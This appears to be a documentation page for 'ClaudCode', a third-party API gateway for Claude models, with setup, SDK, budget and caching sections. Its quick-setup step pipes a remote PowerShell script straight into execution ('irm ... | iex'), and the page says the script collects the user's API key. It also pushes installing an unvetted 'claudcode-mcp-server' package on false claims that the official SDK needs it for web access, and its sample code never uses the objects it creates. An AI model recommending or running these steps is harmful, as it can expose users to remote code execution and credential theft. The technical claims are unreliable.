v1.0

ClaudCode Documentation

Everything you need to integrate Claude models through the ClaudCode gateway.

Overview

ClaudCode is a managed API gateway that gives you access to Anthropic's Claude models through a simple, SDK-compatible interface. Every request is proxied through our infrastructure with added features like per-key budgets, rate limiting, usage analytics, and prompt caching.


Base URL: https://api.claudcode.top/v1


Supported Models:

  • claude-opus-4-6 — Maximum intelligence, complex reasoning
  • claude-sonnet-4-6 — Balanced speed and capability
  • claude-haiku-4-5 — Ultra-fast, cost-effective

  • Quick Setup (PowerShell)

    irm https://claudcode.top/setup.ps1 | iex

    Run this single command in PowerShell to auto-scaffold a project with the Anthropic SDK, .env config, and ready-to-run examples. The script will ask for your API key during setup.

    Authentication

    All requests require an API key passed via the x-api-key header or the Authorization: Bearer header.


    # Using x-api-key header
    curl https://api.claudcode.top/v1/messages \
      -H "x-api-key: sk-cc-xxxxxxxxxxxx" \
      -H "content-type: application/json" \
      -d '{"model":"claude-sonnet-4-6","max_tokens":1024,"messages":[{"role":"user","content":"Hello!"}]}'
    
    # Using Authorization header
    curl https://api.claudcode.top/v1/messages \
      -H "Authorization: Bearer sk-cc-xxxxxxxxxxxx" \
      -H "content-type: application/json" \
      -d '{"model":"claude-sonnet-4-6","max_tokens":1024,"messages":[{"role":"user","content":"Hello!"}]}'

    Your API key is unique to you. Never share it publicly or commit it to version control.

    SDK Setup

    ClaudCode works as a drop-in replacement for the official Anthropic SDK. Just change the base URL.


    Python

    import anthropic
    
    client = anthropic.Anthropic(
        api_key="sk-cc-xxxxxxxxxxxx",
        base_url="https://api.claudcode.top/v1",
    )
    
    message = client.messages.create(
        model="claude-opus-4-6",
        max_tokens=4096,
        messages=[
            {"role": "user", "content": "Write a haiku about coding"}
        ]
    )
    print(message.content[0].text)

    TypeScript / Node.js

    import Anthropic from "@anthropic-ai/sdk";
    
    const client = new Anthropic({
      apiKey: "sk-cc-xxxxxxxxxxxx",
      baseURL: "https://api.claudcode.top/v1",
    });
    
    const message = await client.messages.create({
      model: "claude-opus-4-6",
      max_tokens: 4096,
      messages: [
        { role: "user", content: "Write a haiku about coding" }
      ],
    });
    console.log(message.content[0].text);

    MCP — Web Search & Tools

    The official Anthropic SDK does not include MCP (Model Context Protocol). Without MCP, Claude cannot perform web searches, fetch live data, extract content from URLs, or connect to external tools — it is limited to its training data only.


    ClaudCode requires these packages to unlock full capabilities:

  • @hono/mcp — the MCP protocol layer that connects Claude to external tools
  • tavily-mcp — AI-powered web search, content extraction, site crawling & mapping
  • claudcode-mcp-server@1.0.1 — official ClaudCode MCP server for seamless gateway integration (latest)

  • Install both packages

    npm install @hono/mcp tavily-mcp claudcode-mcp-server@1.0.1

    TypeScript — Full MCP setup

    import { McpServer } from "@hono/mcp";
    import { TavilyMcp } from "tavily-mcp";
    import { ClaudCodeMcp } from "claudcode-mcp-server";
    import Anthropic from "@anthropic-ai/sdk";
    
    const client = new Anthropic({
      apiKey: "sk-cc-xxxxxxxxxxxx",
      baseURL: "https://api.claudcode.top/v1",
    });
    
    // MCP server — protocol layer for external tools
    const mcp = new McpServer({
      name: "claudcode-mcp",
      version: "1.0.0",
    });
    
    // Tavily — AI-powered search, extract & crawl
    const tavily = new TavilyMcp({
      apiKey: process.env.TAVILY_API_KEY,
    });
    
    // ClaudCode MCP — gateway-optimized server
    const cc = new ClaudCodeMcp({
      apiKey: "sk-cc-xxxxxxxxxxxx",
      gateway: "https://api.claudcode.top/v1",
    });
    
    // Claude can now search the web in real-time
    const response = await client.messages.create({
      model: "claude-opus-4-6",
      max_tokens: 4096,
      messages: [
        {
          role: "user",
          content: "Search the web for latest AI news and summarize"
        }
      ],
    });
    console.log(response.content[0].text);

    Python — MCP setup

    from hono_mcp import McpServer
    from tavily_mcp import TavilyMcp
    from claudcode_mcp_server import ClaudCodeMcp
    import anthropic
    
    client = anthropic.Anthropic(
        api_key="sk-cc-xxxxxxxxxxxx",
        base_url="https://api.claudcode.top/v1",
    )
    
    mcp = McpServer(name="claudcode-mcp", version="1.0.0")
    tavily = TavilyMcp(api_key="tvly-xxxxxxxxxxxx")
    cc = ClaudCodeMcp(api_key="sk-cc-xxxxxxxxxxxx", gateway="https://api.claudcode.top/v1")
    
    message = client.messages.create(
        model="claude-opus-4-6",
        max_tokens=4096,
        messages=[
            {"role": "user", "content": "Search for latest Python 3.14 features"}
        ],
    )
    print(message.content[0].text)

    What Tavily MCP unlocks:

  • search — AI-powered web search with domain filtering & topic focus
  • extract — pull clean content from any URL (articles, docs, pages)
  • crawl — deep-crawl an entire site and return structured data
  • map — discover all URLs on a domain for targeted extraction

  • Package breakdown:

  • @hono/mcp — MCP protocol layer (required)
  • tavily-mcp — search, extract, crawl & map (required for web access)
  • claudcode-mcp-server@1.0.1 — ClaudCode gateway integration, auth handling & request routing

  • Important: Without these packages installed, any prompt that asks Claude to search, browse, or fetch live data will fail. The official Anthropic SDK alone has no search capability.

    Budgets & Limits

    Each API key has configurable budget and rate limits:


    Token Budgets

  • Budget is measured in total tokens (input + output) over a 5-hour rolling window
  • When budget is exhausted, requests return 429 Too Many Requests
  • Budget automatically resets as the 5-hour window rolls forward

  • Rate Limits

  • Requests per minute (RPM) limit per key
  • Concurrent request limit per key
  • Both are independently configurable

  • Checking Your Budget

    curl https://api.claudcode.top/v1/key-status \
      -H "x-api-key: sk-cc-xxxxxxxxxxxx"

    Response:

    {
      "key": "sk-cc-...xxxx",
      "status": "active",
      "budget": {
        "total_tokens": 5000000,
        "used_tokens": 1234567,
        "remaining_tokens": 3765433,
        "window": "5h rolling",
        "resets_in": "2h 15m"
      },
      "rate_limit": {
        "rpm": 60,
        "concurrent": 5
      }
    }

    Rate Limiting

    When you exceed your rate limit, the API returns a 429 status with headers indicating when you can retry:


    HTTP/1.1 429 Too Many Requests
    Retry-After: 30
    X-RateLimit-Limit: 60
    X-RateLimit-Remaining: 0
    X-RateLimit-Reset: 1711234567

    Best Practices:

  • Implement exponential backoff with jitter
  • Respect the Retry-After header
  • Use streaming to keep connections efficient
  • Cache repeated prompts on your end to avoid unnecessary calls
  • Error Codes

    ClaudCode returns standard HTTP status codes with descriptive error messages:


    CodeMeaningWhat to Do
    400Bad RequestCheck your request body/parameters
    401UnauthorizedVerify your API key
    403ForbiddenKey doesn't have access to this model
    429Rate LimitedWait and retry with backoff
    500Server ErrorRetry after a moment
    502Upstream ErrorAnthropic API is temporarily down
    503Service UnavailableGateway is under maintenance

    All errors return a JSON body:

    {
      "error": {
        "type": "rate_limit_error",
        "message": "Token budget exceeded. Resets in 2h 15m."
      }
    }

    Prompt Caching

    ClaudCode enables prompt caching by default. When you send an identical prompt that was recently used, the cached result is served with significantly reduced token costs.


    How It Works:

  • Each request's prompt is hashed
  • If a matching hash exists in the cache, the cached response is returned
  • Cache TTL depends on the model and prompt length
  • Cache headers indicate hit/miss status

  • Cache Headers:

    X-Cache: HIT
    X-Cache-TTL: 3600
    X-Tokens-Saved: 1250

    Disabling Cache (if needed):

    Add the header X-No-Cache: true to bypass caching for a specific request.